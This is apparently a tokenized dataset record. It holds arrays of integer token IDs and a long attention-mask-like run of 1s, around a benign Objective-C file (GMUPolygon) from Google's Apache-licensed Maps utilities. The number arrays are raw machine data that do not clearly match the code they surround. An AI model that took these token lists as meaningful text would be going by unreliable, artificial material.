29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29875, 29918, 305, 392, 280, 29871, 29906, 13, 29875, 29918, 1807, 29871, 29906, 13, 29875, 29918, 2966, 29871, 29906, 13, 29875, 29918, 19227, 29871, 29906, 13, 29875, 29918, 305, 392, 280, 29918, 29873, 29871, 29906, 13, 29875, 29918, 1807, 29918, 29873, 29871, 29906, 13, 29875, 29918, 2966, 29918, 29873, 29871, 29906, 13, 29875, 29918, 19227, 29918, 29873, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29872, 29918, 305, 392, 280, 29871, 29906, 13, 29872, 29918, 1807, 29871, 29906, 13, 29872, 29918, 2966, 29871, 29906, 13, 29872, 29918, 19227, 29871, 29906, 13, 29872, 29918, 305, 392, 280, 29918, 29873, 29871, 29906, 13, 29872, 29918, 1807, 29918, 29873, 29871, 29906, 13, 29872, 29918, 2966, 29918, 29873, 29871, 29906, 13, 29872, 29918, 19227, 29918, 29873, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29906, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29906, 13, 29930, 29899, 29930, 2178, 4231, 3276, 334, 29899, 29930, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
/* Copyright (c) 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #import "GMUPolygon.h" @implementation GMUPolygon @synthesize type = _type; - (instancetype)initWithPaths:(NSArray<GMSPath *> *)paths { if (self = [super init]) { _type = @"Polygon"; _paths = [paths copy]; } return self; } @end
[ 1, 4949, 14187, 1266, 313, 29883, 29897, 29871, 29906, 29900, 29896, 29953, 5087, 9266, 29889, 13, 334, 13, 334, 10413, 21144, 1090, 278, 13380, 19245, 29892, 10079, 29871, 29906, 29889, 29900, 313, 1552, 376, 29931, 293, 1947, 1496, 13, 334, 366, 1122, 451, 671, 445, 934, 5174, 297, 752, 13036, 411, 278, 19245, 29889, 13, 334, 887, 1122, 4017, 263, 3509, 310, 278, 19245, 472, 13, 334, 13, 334, 268, 1732, 597, 1636, 29889, 4288, 29889, 990, 29914, 506, 11259, 29914, 27888, 1430, 1660, 29899, 29906, 29889, 29900, 13, 334, 13, 334, 25870, 3734, 491, 22903, 4307, 470, 15502, 304, 297, 5007, 29892, 7047, 13, 334, 13235, 1090, 278, 19245, 338, 13235, 373, 385, 376, 3289, 8519, 29908, 350, 